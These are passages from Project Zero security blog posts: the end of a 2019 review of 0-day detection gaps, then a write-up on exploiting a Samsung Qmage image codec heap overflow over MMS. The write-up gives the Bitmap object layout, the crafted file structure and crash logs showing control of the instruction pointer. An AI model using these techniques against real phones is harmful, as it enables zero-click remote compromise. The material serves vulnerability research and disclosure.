Who is doing the detecting? Another interesting side of detection is that a single security researcher, Clément Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. 
Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it’s so difficult for external researchers to get into those platforms and detect exploitation.
“Clandestine” 0-day reportingAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.
0-day Detection on Mobile PlatformsAs mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to Zerodium. We know that these exploits are being developed and used, we’re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?
Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.
Detection on Other PlatformsIt’s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are the other much more prevalent products. If that’s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this blogpost details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can’t make confident determinations of how much 0-day exploitation is occurring per platform.ConclusionHere’s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily “technical”, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. 
Along with publishing this Year in Review today, we’re also publishing the root cause analyses that we completed, which were used to draw our conclusions. Please check out the blog post if you’re interested in more details about the different 0-days exploited in the wild in 2019. 
Kategorie: Hacking & Security

MMS Exploit Part 3: Constructing the Memory Corruption Primitives

28 Červenec, 2020 - 21:50
Posted by Mateusz Jurczyk, Project Zero
This post is the third of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
IntroductionIn Part 2, I discussed how I managed to fuzz-test the Qmage codec on Google infrastructure at the turn of 2019/2020. It led to the discovery of a huge number of unique crashes, many of which manifested obvious memory corruption problems. After reporting them to Samsung on 28 January 2020, my attention turned to the idea of using some of the vulnerabilities to write an MMS exploit. There was evidence that the Samsung Messages app processed incoming bitmaps without any user interaction, so this seemed like the perfect opportunity to see just how realistic such an attack could be with a wide range of image parsing bugs to choose from. The prospect of developing a zero-click exploit running over the mobile network was new and thrilling to me, and it got me very excited to take the challenge.
The first step in the process was to identify the crashes that were not just high severity on paper, but were also the most convenient for exploitation in a real-life scenario. An ideal bug would be easy to work with (i.e. require a relatively simple structure of the Qmage file), and would provide full control over the memory corruption condition. In case of a heap buffer overflow, this would imply control over the allocation size, overflow size, overflow data, and possibly even the overflow offset (in a non-linear case). Such a bug would lay a strong foundation for any higher-order mechanisms that would have to be implemented in the exploit.
This blog post describes the additional crash triage I performed to find the most suitable bug for exploitation, followed by an analysis of how it was used to turn plain memory corruption into more useful primitives: control over the instruction pointer (PC), and the ability to "probe" the existence of memory ranges. In practice, I was simultaneously experimenting with the MMS protocol to get an initial feel of its design, capabilities and limitations. However, for the sake of clarity, I will limit the scope of this write-up to the low level exploitation details, and proceed to link the memory corruption with the MMS delivery channel in future posts. Let's get started!Heap fundamentals in AndroidThe first observation to make is that a great majority of the identified crashes were heap-oriented. There were some instances of stack buffer overflows, but the stack cookie mitigation rendered them non-exploitable. There were also other cases such as reads from uninitialized stack-based pointers, but they didn't seem particularly useful, so in the end, I decided to focus on the 174 "write" crashes, all of which referenced out-of-bounds heap addresses. In principle, such bugs tend to provide the most flexibility in exploitation, as they can be used to corrupt a variety of objects in memory. So, if we are going to work with the Android heap, we should get familiar with the underlying allocator and its security properties.
The allocator currently used in all modern versions of Android is jemalloc (side note: this is going to change with the introduction of Scudo in Android 11). There were two main resources that I found especially useful when learning and experimenting with jemalloc:
  • "The Shadow over Android: Heap exploitation assistance for Android’s libc allocator" at INFILTRATE 2017 (slides) and the shadow exploitation framework itself (GitHub).
  • "A Tale of Two Mallocs: On Android libc Allocators" at INFILTRATE 2018 (video), and the accompanying blog post series (specifically part 2).

I won't go into much detail regarding the internals of the allocator (you can find them in the above sources), but I would like to highlight the following properties that are most relevant to this research:
  • Determinism: jemalloc behaves deterministically, at least to the extent observable by the attacker. For example, with a clean state of the heap, two subsequent allocations of the same size are positioned next to each other.
  • Lack of inline metadata: metadata is stored separately from the allocation itself, so an overflow of one chunk (or "region", as it's called in jemalloc) immediately overwrites the data of the adjacent one, with no metadata in between.
  • Division into size classes: allocations are grouped by size, so any two allocations can only be adjacent to each other if they fall into the same size "bin".
  • Thread caches: a mechanism called "tcaches" improves locality by quickly reusing recently freed regions. This guarantees the predictability of some allocation patterns – for example, a malloc → free → malloc sequence of the same length will return the same address twice.

These characteristics can be favorable or disadvantageous depending on the specific bug and context around it. Overall, in this case, I think these properties added up to a "net positive" from the attacker's perspective, which is not great for user security. For this reason, I am really looking forward to seeing the hardened Scudo allocator enabled by default in Android 11.
Now that we have some background on the behavior we can expect from jemalloc, it's time to analyze the write-violation crashes in search of the most promising ones.Finding the right bugWith all that we know about jemalloc, we can make a working assumption that if there are two malloc calls, and they can be made to be of a similar size, the second one can be corrupted by the first one with a forward overflow, because it is (usually) placed at a higher address. So in order to assess the usability of a crash, we need to determine:
  • What region is overwritten by the bug?
  • What are the other allocations that are requested between the overwritten allocation and the overflow, and are used after the overflow?

The SkCodecFuzzer test harness has an -l flag that enables the logging of all mallocs and frees to stderr at runtime. It can be used to match the address of the invalid memory access with the corresponding allocation, and see what other allocations are made in between. For example, if we take the signal_sigsegv_40064924d0_4336_c77562cdc52d1baed45ff05bc9ae2023.qmg sample and run it through the loader with the -l flag, we should see the following output (malloc stack traces were edited out for brevity):
[...][+] Detected image characteristics:[+] Dimensions:      148 x 192[+] Color type:      4[+] Alpha type:      3[+] Bytes per pixel: 4[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}ASAN:SIGSEGV===================================================================212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)    #0 0x002b54d0 in (QuramQmageGrayIndexRleDecode+0xdc)    #1 0x0029d584 in (__QM_WCodec_decode+0xa3c)    #2 0x0029c9b4 in (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)    #3 0x0029ae7c in (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)[...]
Here, the invalid 0x408c125000 address is the same as the end of the third allocation requested after printing out the image characteristics. Its size of 28416 bytes coincides with 148 (width) × 192 (height), so we can presume that it is a pixel storage buffer and therefore has controlled length. There are two more allocations (highlighted in red) made after the overflown buffer and kept alive until the crash, so each of them could be the target of the memory corruption. In the call stack, we can also see that the problem occurs during RLE decoding, which is a well-known algorithm and thus would probably meet our criteria of being easy to work with. This is how a specific crash can be evaluated for exploitability.
Since I wished to explore the whole range of options and manually performing the same analysis on the other 173 unique "write" crashes seemed tedious, I wrote a quick bash script to generate and process the crash logs to match the invalid accessed addresses with corresponding heap regions. After sorting and deduplicating, they added up to a total of 23 unique overwritten allocation sites. I was not particularly interested in QMv1 crashes (the old format wasn't correctly handled by the Messages application), so I filtered them out from the results, leaving me with 17 allocations subject to overflow. That was a much more manageable number of cases to go through by hand.
After a brief analysis, I concluded that many of them were not optimal for my exploit, because they were temporary buffers, allocated and immediately overflown without any mallocs taking place in between. Taking advantage of such a bug would require an earlier allocation to be mapped above the buffer – a heap state that is possible, but harder to reliably achieve with the limited heap manipulation capabilities of the image codec. The remaining allocation sites that had some potential could be divided into four major groups:
Option 1: The pixel storage buffer associated with the Bitmap object, which is the #1 malloc made by the harness after parsing the headersExample crash IDe9e773f3e0a6d155636a52a5418d9160SizeControlled through the bitmap dimensionsAllocated inSkBitmap::tryAllocPixelsOverflown by
  • QuramQumageDecoder8bit
  • QuramQumageDecoder32bit24bit
  • QuramQmageGrayIndexRleDecode
  • qme_inflate_fast (via PVcodecDecoder_zip)
Potential corruption targetsThe android::Bitmap object allocated directly after, and any further allocation made by the specific codec (depending on which one is used to trigger the overflow)
Option 2: A temporary output storage buffer, which is the #3 malloc made by the harness after parsing the headers (preceded only by the bitmap object allocation), and the first allocation in the getAndroidPixels callExample crash IDb0749f475f0b7af444625c3d1c3a5be8SizeControlled through the bitmap dimensionsAllocated inQuramQmageDecodeFrame_Rev14474_20150224Overflown by
  • QuramQumageDecoder8bit
  • QuramQmageGrayIndexRleDecode
Potential corruption targets
  • The decoding context structure of size 1688 allocated at the beginning of QuramQumageDecoder8bit, as well as any of the numerous other allocations in that function
  • The RLE decoding context structure of size 4120 allocated in QuramQmageGrayIndexRleDecode

Option 3: A temporary RLE decoding bufferExample crash ID03f2d8074d5797537e8c615b2fa53cefSizeControlled 32-bit integer from the input streamAllocated in
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Overflown by
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Potential corruption targetsThe RLE decoding context structure of size 4120
Option 4: A temporary zlib decoding bufferExample crash IDcbd3dbc9e71b2fec9606eaa3eafce056SizeControlled through the bitmap dimensionsAllocated inQuramQumageDecoder32bit24bitOverflown byqme_inflate (as called by QuramQumageDecoder32bit24bit → DecodePrediction2dZip → PVcodecDecoder_zip → qme_uncompress)Potential corruption targetsThe zlib decoding context structure of size 12928
After some consideration, I decided that option 1 (bitmap pixel buffer) was the most promising one, because:
  • It was the earliest overflown malloc, making it possible to corrupt the widest range of subsequently allocated objects, including the Bitmap object.
  • The size was controlled, and in the case of RLE and zlib decompression, the overflow length and data were controlled too. On top of it, I was familiar with both algorithms and thus didn't anticipate any problems constructing the exploit files.

To be specific, I started my experimentation with the e418c0496cb1babf0eba13026f4d1504 crash and the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample. It generated the following report (malloc stack traces again edited out):
[...][+] Detected image characteristics:[+] Dimensions:      40 x 7[+] Color type:      4[+] Alpha type:      3[+] Bytes per pixel: 4malloc(      1120) = {0x408c13bba0 .. 0x408c13c000}malloc(       104) = {0x408c13df98 .. 0x408c13e000}malloc(        24) = {0x408c13ffe8 .. 0x408c140000}malloc(      4120) = {0x408c141fe8 .. 0x408c143000}ASAN:SIGSEGV===================================================================3746114==ERROR: AddressSanitizer: SEGV on unknown address 0x408c13c000 (pc 0x40071feb74 sp 0x4000d0b1f0 bp 0x4000d0b1f0 T0)    #0 0x00249b74 in (QuramQmageGrayIndexRleDecode+0xd8)    #1 0x002309d8 in (PVcodecDecoderIndex+0x110)    #2 0x00230854 in (__QM_WCodec_decode+0xe4)    #3 0x00230544 in (Qmage_WDecodeFrame_Low+0x198)    #4 0x0022c604 in (QuramQmageDecodeFrame+0x78)[...]
Here, we are overflowing the 1120-byte buffer (width × height × bpp; 40 × 7 × 4 = 1120), and can corrupt the three subsequent ones marked in red. The first (104 bytes) is the Bitmap structure, the second (24 bytes) is the RLE-compressed input stream, and the third (4120 bytes) is the RLE decoder context structure. The Bitmap object sounds the most useful, and since I have already mentioned it so many times, let's finally look into it to see how it works! We'll be operating on the assumption that if we adjust the Qmage dimensions such that the pixel buffer consumes 104 bytes (e.g. 13x2), then the two allocations will likely be adjacent on Android, giving us full (linear) control over the second region.Enter the Android Bitmap objectFirst of all, it is important to note that the Bitmap object created by our test harness is not exactly the same as the one used in Android, because of a difference in the allocator objects used (SkBitmap::HeapAllocator vs GraphicsJNI's HeapAllocator). This is irrelevant for fuzzing, but makes a big difference in exploit development. In order to learn about the actual object being allocated on Android, we can use a simple Frida script that hooks the heap-related functions and logs all of their invocations with stack trace. If we attach it to the process and send an MMS with the proof-of-concept image, we should see output similar to the following (I demangled some symbols and edited out argument definitions for brevity):
[10036] calloc(1120, 1) => 0x7bc1e95900    0x7cbba83684!android::Bitmap::allocateHeapBitmap+0x34    0x7cbba88b54!android::Bitmap::allocateHeapBitmap+0x9c    0x7cbd827178!HeapAllocator::allocPixelRef+0x28    0x7cbbd1ae80!SkBitmap::tryAllocPixels+0x50    0x7cbd820ae8!0x187ae8    0x7cbd81fc8c!0x186c8c    0x70a04ff0 boot-framework.oat!0x2bbff0[10036] malloc(160) => 0x7b8cd569e0    0x7cbddd35c4!operator new+0x24    0x7cbe67e608[10036] malloc(24) => 0x7b8ca92580    0x7cbb87baf4!QuramQmageGrayIndexRleDecode+0x58    0x7cbe67e608[10036] calloc(1, 4120) => 0x7bc202c000    0x7cbb89fb14!init_process_run_dec+0x20    0x7cbb87bb34!QuramQmageGrayIndexRleDecode+0x98    0x7cbb8629d4!PVcodecDecoderIndex+0x10c    0x7cbb862850!__QM_WCodec_decode+0xe0    0x7cbb862540!Qmage_WDecodeFrame_Low+0x194    0x7cbb85e600!QuramQmageDecodeFrame+0x74[...]
Here, we can again see the familiar highlighted allocations before the overflow occurs. The only difference is the size of the Bitmap object: it's 104 in our loader but 160 on Android. Unfortunately Frida didn't correctly unwind the stack for the malloc call, but based on the pixel buffer stack trace, we can figure out that it takes place in android::Bitmap::allocateHeapBitmap:
116:  sk_sp<Bitmap> Bitmap::allocateHeapBitmap(size_t size, const SkImageInfo& info, size_t rowBytes) {117:      void* addr = calloc(size, 1);118:      if (!addr) {119:          return nullptr;120:      }121:      return sk_sp<Bitmap>(new Bitmap(addr, size, info, rowBytes));122:  }
As expected, there is a calloc call for allocating pixel storage, followed by the creation of the Bitmap object itself. This is how the function prologue looks in Hex-Rays:

If we quickly change the Qmage file dimensions to 10x4, such that the pixel buffer becomes 160 (or any length between 129 and 160, which is the relevant jemalloc bin size), then we can use Frida to verify that the two Bitmap-related allocations are indeed adjacent:
[15699] calloc(160, 1) => 0x7b88feb8c0    0x7cbba83684!android::Bitmap::allocateHeapBitmap+0x34    0x7cbba88b54!android::Bitmap::allocateHeapBitmap+0x9c    0x7cbd827178!HeapAllocator::allocPixelRef+0x28    0x7cbbd1ae80!SkBitmap::tryAllocPixels+0x50    0x7cbd820ae8!0x187ae8    0x7cbd81fc8c!0x186c8c    0x70a04ff0 boot-framework.oat!0x2bbff0[15699] malloc(160) => 0x7b88feb960    0x7cbddd35c4!operator new+0x24    0x7cbe582608
The difference between 0x7b88feb8c0 and 0x7b88feb960 is 160 (0xA0), exactly the size of the first chunk, which means that we should be able to precisely overwrite the succeeding android::Bitmap object. This behavior is not 100% reliable and is hugely dependent on the preexisting heap state of the attacked app, but I found that it was reliable enough to enable successful, practical attacks. I will expand more on this in the next blog post in the series.
It's finally time to look at the android::Bitmap layout in memory. Currently, the class is defined in frameworks/base/libs/hwui/hwui/Bitmap.h in the Android source tree. Some of its private fields are visible there, but their volume surely doesn't sum up to 160 bytes. This is because the code makes heavy use of C++ inheritance, so android::Bitmap inherits from SkPixelRef → SkRefCnt → SkRefCntBase. After untangling the above chain of classes and figuring out the alignment requirements for each field, I arrived at the following layout:
struct android::Bitmap {
  /* +0x00 */ void *vtable;
  //  // class SK_API SkRefCntBase  //
  /* +0x08 */ mutable std::atomic<int32_t> fRefCnt;
  //  // class SK_API SkPixelRef : public SkRefCnt  //
  /* +0x0C */ int     fWidth;  /* +0x10 */ int     fHeight;  /* +0x18 */ void*   fPixels;  /* +0x20 */ size_t  fRowBytes;
  /* +0x28 */ mutable std::atomic<uint32_t> fTaggedGenID;
  struct /* SkIDChangeListener::List */ {  /* +0x30 */ std::atomic<int> fCount;  /* +0x34 */ SkOnce           fOSSemaphoreOnce;  /* +0x38 */ OSSemaphore*     fOSSemaphore;  } fGenIDChangeListeners;
  struct /* SkTDArray<SkIDChangeListener*> */ {  /* +0x40 */ SkIDChangeListener* fArray;  /* +0x48 */ int                 fReserve;  /* +0x4C */ int                 fCount;  } fListeners;
  /* +0x50 */ std::atomic<bool> fAddedToCache;
  /* +0x51 */ enum Mutability {  /* +0x51 */   kMutable,  /* +0x51 */   kTemporarilyImmutable,  /* +0x51 */   kImmutable,  /* +0x51 */ } fMutability : 8;
  //  // class ANDROID_API Bitmap : public SkPixelRef  //
  struct /* SkImageInfo */ {  /* +0x58 */ sk_sp<SkColorSpace> fColorSpace;  /* +0x60 */ int fWidth;  /* +0x64 */ int fHeight;  /* +0x68 */ SkColorType fColorType;  /* +0x6C */ SkAlphaType fAlphaType;  } mInfo;
  /* +0x70 */ const PixelStorageType mPixelStorageType;  /* +0x74 */ BitmapPalette mPalette;  /* +0x78 */ uint32_t mPaletteGenerationId;  /* +0x7C */ bool mHasHardwareMipMap;
  union {    struct {  /* +0x80 */ void* address;  /* +0x88 */ void* context;  /* +0x90 */ FreeFunc freeFunc;    } external;
    struct {  /* +0x80 */ void* address;  /* +0x88 */ int fd;  /* +0x90 */ size_t size;    } ashmem;
    struct {  /* +0x80 */ void* address;  /* +0x88 */ size_t size;    } heap;
    struct {  /* +0x80 */ GraphicBuffer* buffer;    } hardware;  } mPixelStorage;
  /* +0x98 */ sk_sp<SkImage> mImage;};
We can immediately spot a number of interesting fields such as the vtable, pointer to backing pixel storage, bitmap dimensions, a raw function pointer (freeFunc), and pointers to other C++ objects such as SkColorSpace, GraphicBuffer and SkImage. The class clearly has the potential to supply many useful exploitation primitives. Let's go ahead and test some initial ideas to see how the code behaves in contact with a corrupted Bitmap object.Building code execution primitivesIn order to start experimenting with the heap corruption, we have to construct a test case that will be easy to adjust for different tests. For building editable binary files for testing file format parsers, I usually use nasm. It allows me to write code-like .asm sources file that specify the values of respective header fields with the db/dw/dd/… pseudo-instructions, may include comments, and can be quickly "compiled" to raw binary form. This is what I also used here, to craft the proof-of-concept Qmage file from scratch, based on the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample and reverse engineering the codec in This is where the debug symbols from old builds of I dug up earlier in the recon phase (as discussed in Part 1) proved very useful.
The nasm source code of the Qmage file I used for experimentation can be found here. It consists of the following logical parts:
  • File header specifying a QG1.2 format version (equivalent to 2.0, as explained in Part 2) and 4x10 bitmap dimensions.
  • A zlib-compressed color table with all 0x41's.
  • A required \xFF\x00 marker, followed by the 0x06 RLE compression type.
  • A RLE-compressed stream of 161-320 bytes: the first 160 to fill out the pixel buffer, followed by 1-160 bytes depending on what portion of the android::Bitmap object we intend to overwrite.
  • A trailing \xFF\x00 marker.

Notably, the RLE compression used in Qmage is not the simple one we know from BMP files. Based on the structure of the code and some RLE-related symbols (init_process_run, process_run, init_process_run_dec, process_run_dec), we can deduce that it is probably a MELCODE scheme. For our purposes, though, it's not much more complicated. If we intend to take a data blob and wrap it with the RLE structure while actually not reducing its size (similar to how zlib compression level 0 works), it's a matter of adding a simple prefix and suffix. For example, a compressed 8-byte string "ABCDEFGH" takes the following form:
00000000: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48  ........ABCDEFGH00000010: aa aa                                            ..
The little-endian 0x0000000E value indicates the length of the overall compressed stream, 0x00000008 specifies the number of runs – in this case, length of the decompressed data, then there is the raw data and finally N÷4 bytes 0xAA, each of which signifies four runs, one-byte each. With that out of the way, we can proceed to testing potential code execution primitives.
The first idea is to overwrite the vtable pointer and see if/where the code crashes. Since it's the first field in memory, we only have to write 8 bytes past the end of the pixel buffer. If we set them to AAAAAAAA and send such a file via MMS, we should see the following crash:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151 in tid 24642 (ReferenceQueueD), pid 24624 (droid.messaging)*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***[...]pid: 24624, tid: 24642, name: ReferenceQueueD  >>> <<<uid: 10128signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151    x0  0000007c2ac85e40  x1  0000007c25ae9724    x2  0000007cbd81f1b8  x3  0000007c2ad2d9c0    x4  000000006f2693ac  x5  0000007c25ae96e4    x6  0000000000000001  x7  0000000000000000    x8  4141414141414141  x9  0000000000000000    x10 0000000000000000  x11 0000007c3a3f4000    x12 0000000000360168  x13 0000000000004000    x14 0000000000000004  x15 0000000000000000    x16 0000007c25ae9710  x17 0000000000000bc3    x18 0000007bd31ee000  x19 0000007c2ad2d9c0    x20 0000007c3034ff80  x21 0000000013126208    x22 0000000013126208  x23 00000000131261a0    x24 000000006f26bb50  x25 00000000131261e0    x26 0000007cc0350cb0  x27 0000007c3a3f5000    x28 0000007c25aea020  x29 0000007c25ae9700    sp  0000007c25ae96f0  lr  00000000705bdc44    pc  0000007cbd81f210
backtrace:      #00 pc 0000000000186210  /system/lib64/ (Bitmap_destruct(android::BitmapWrapper*)+88) (BuildId: 21b5827e07da22480245498fa91e171d)[...]
There is an access to the controlled 0x4141414141414141 address in Bitmap_destruct. The code accessing the pointer is as follows:
.text:0000000000186210                 LDR             X8, [X8,#0x10].text:0000000000186214                 BLR             X8
As expected, we get an arbitrary vtable call. It is a great first primitive to confirm, and it is direct evidence that everything seems to be working according to plan. Of course at this point, we don't know where any code is located (to redirect execution there), or even where our controlled data is situated (to set up our fake vtable). However, let's focus on one thing at a time. What's important is that the vtable call is controlled by the value of the consecutive fRefCnt field, so we may choose to trigger it or not by setting the reference counter to a small or large integer.
The second eye-catching field that can be likely abused to hijack code execution is the freeFunc function pointer in the mPixelStorage union:
    struct {  /* +0x80 */ void* address;  /* +0x88 */ void* context;  /* +0x90 */ FreeFunc freeFunc;    } external;
We can check where the pointer is used by running a quick search. As it turns out, it is called in the Bitmap::~Bitmap destructor:
236:       case PixelStorageType::External:237:            mPixelStorage.external.freeFunc(mPixelStorage.external.address,238:                                            mPixelStorage.external.context);239:            break;
If we look at the broader context of the code, the destructor may provide the attacker with an assortment of primitives, depending on the value of the mPixelStorageType enum: arbitrary munmap+close, arbitrary free, and another arbitrary vtable call (through the mPixelStorage.hardware.buffer pointer). However, I find the freeFunc pointer the most useful, especially in a potential one-shot scenario where we try to take over control of the app with a single, specially crafted MMS message. Conveniently, the function also takes two arguments, which we may control – or in fact, must control, because reaching the freeFunc field with a linear overflow is only possible after overwriting both address and context.
The only problem with this technique is that the Bitmap destructor itself is called through the vtable at offset 0, the one that we have to corrupt in order to get to the deeper fields in the class. Therefore, we can only use it in our exploit if we leave the vtable pointer intact after the overflow. This, in turn, requires the knowledge of the base address. At this point in the story, we don't know how we could leak such information yet, but exploitation gadgets like this are worth writing down even if we don't have all the pieces of the puzzle to make use of them yet.
To make sure that we're reading the code right, we should confirm the behavior in practice. We can construct a Qmage sample that overwrites the full 160 bytes of the Bitmap object with a marker 0x41 byte, and then fine-tune a few specific fields for the experiment:
  • vtable set to its original value, in my case 0x7cbbdfc4e0 (0x7cbb632000 base address + 0x7ca4e0 offset)
  • fRefCnt set to 1
  • mPixelStorageType set to 0 (External)
  • mPixelStorage.external.address set to
  • mPixelStorage.external.context set to 0xbbbb...bbb.
  • mPixelStorage.external.freeFunc set to 0xcccc...ccc.

If we send it via MMS, we should see the following crash in logcat:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 13700 (pool-5-thread-1), pid 12954 (droid.messaging)*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***[...]pid: 12954, tid: 13700, name: pool-5-thread-1  >>> <<<uid: 10128signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc    x0  aaaaaaaaaaaaaaaa  x1  bbbbbbbbbbbbbbbb    x2  0000000000000001  x3  0000000000000000    x4  0000007c2be315d0  x5  0000007c3910cc64    x6  0000000000000000  x7  00000000186f2b72    x8  cccccccccccccccc  x9  0000007cbbdfc4f0    x10 0000000000000000  x11 0000007c3a3f4000    x12 0000007c3175b20c  x13 000000005f0cc80f    x14 003419f64036d144  x15 000051761dd7a34a    x16 0000007cbd8f3230  x17 0000007cbba98620    x18 0000007bbc84e000  x19 0000007bc8ff8dc0    x20 0000000000000000  x21 0000007bc9153540    x22 000000000000000c  x23 0000000000000000    x24 0000000000000000  x25 0000000000000002    x26 0000007c2be32d50  x27 0000000000000059    x28 0000007cc03fa7c0  x29 0000007c2be319c0    sp  0000007c2be319b0  lr  0000007cbba69f00    pc  cccccccccccccccc
backtrace:      #00 pc cccccccccccccccc  <unknown>      #01 pc 0000000000437efc  /system/lib64/ (android::Bitmap::~Bitmap()+252) (BuildId: fcab350692b134df9e8756643e9b06a0)[...]
As the crash report shows, we control the instruction pointer (PC) and two 64-bit arguments (registers X0 and X1).
In summary, we have two powerful primitives for hijacking the control flow at our disposal – an indirect one through a corrupted vtable pointer, and a direct one through the freeFunc function pointer (with knowledge of the location). This brings us much closer to the ultimate goal of executing arbitrary code. The biggest unsolved problem is now ASLR – since the locations of all important memory regions (stack, heap, shared objects) are randomized, we are completely in the dark as to where we could redirect any kind of pointer. It is time to see if the android::Bitmap object has anything to offer in terms of leaking address space information or otherwise defeating ASLR.Building an ASLR oracle primitiveIn most publicly documented exploitation scenarios, ASLR is bypassed in a highly interactive environment, where the communication between the exploit and the attacked software goes both ways. Examples include JavaScript exploits vs. web browser engines, user-mode exploits vs. OS kernels, and remote exploits vs. network daemons. In all these cases, the leaked address of some object in memory is typically received by the exploit in full, and the "ASLR bypass" problem boils down to enticing the target to transmit the address to the client as part of a standard data exchange.
The circumstances are largely different for exploits delivered via MMS. Here, all communications are realized through one or more mobile network operators, and it is (mostly) a one way protocol. As a result, a remote attacker gets very little visibility into what happens on the victim's phone, let alone being able to disclose some complex information such as a 64-bit address in one go. Notably, the same problem was already encountered by Samuel Groß when exploiting an iPhone iMessage CVE-2019-8641 vulnerability in 2019. In his research, Samuel managed to work around it by making use of message delivery receipts. Depending on how they are implemented, they may be abused to construct a rudimentary 1-bit communication channel going back to the attacker, potentially carrying some kind of address-related information. In case of iMessage, it conveyed the output of an ASLR oracle, indicating if a given absolute address was mapped in memory and had some specific properties. I highly recommend reading the relevant "Remote iPhone Exploitation Part 2: Bringing Light into the Darkness – a Remote ASLR Bypass" post on the Project Zero blog.
The mechanics of the MMS protocol will be discussed in detail in the next post, but for the sake of the storyline I will reveal that MMS also supports delivery receipts. What's more, some SMS/MMS apps such as Samsung Messages do allow the disclosure of information on whether or not the process crashed while processing the incoming message. In turn, this opens up the opportunity to leak partial information about the address space, if we can tie the crash/no crash outcome to the process memory layout. That's where the corrupted Bitmap object comes into play again.
